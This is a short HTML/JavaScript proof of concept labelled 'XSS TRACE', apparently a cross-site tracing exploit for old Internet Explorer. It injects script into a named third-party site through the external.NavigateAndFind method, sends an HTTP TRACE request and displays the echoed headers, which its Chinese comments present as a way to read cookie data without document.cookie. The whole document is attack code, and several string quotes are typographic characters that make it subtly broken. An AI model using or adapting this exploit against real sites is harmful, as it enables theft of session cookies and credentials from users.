<script type="text/javascript">
<!--
function xssTRACE() {
var openWin=open("blank.htm","swords","width=500,height=400");
var otraceswords=openWin.external;
openWin.location.href="http://wmjie.51.net/swords/";
setTimeout(
function () {
//以下必须写在一行
otraceswords.NavigateAndFind
(’javascript:xmlHttp=new
ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;alert("不用documents.cookie
显示站点wmjie.51.net/swords/ 的头信息。\\n" + xmlDoc);’,"","");
},
1024
);
}
//-->
</script>
<INPUT TYPE=BUTTON onClick="xssTRACE();" VALUE=’XSS TRACE’> |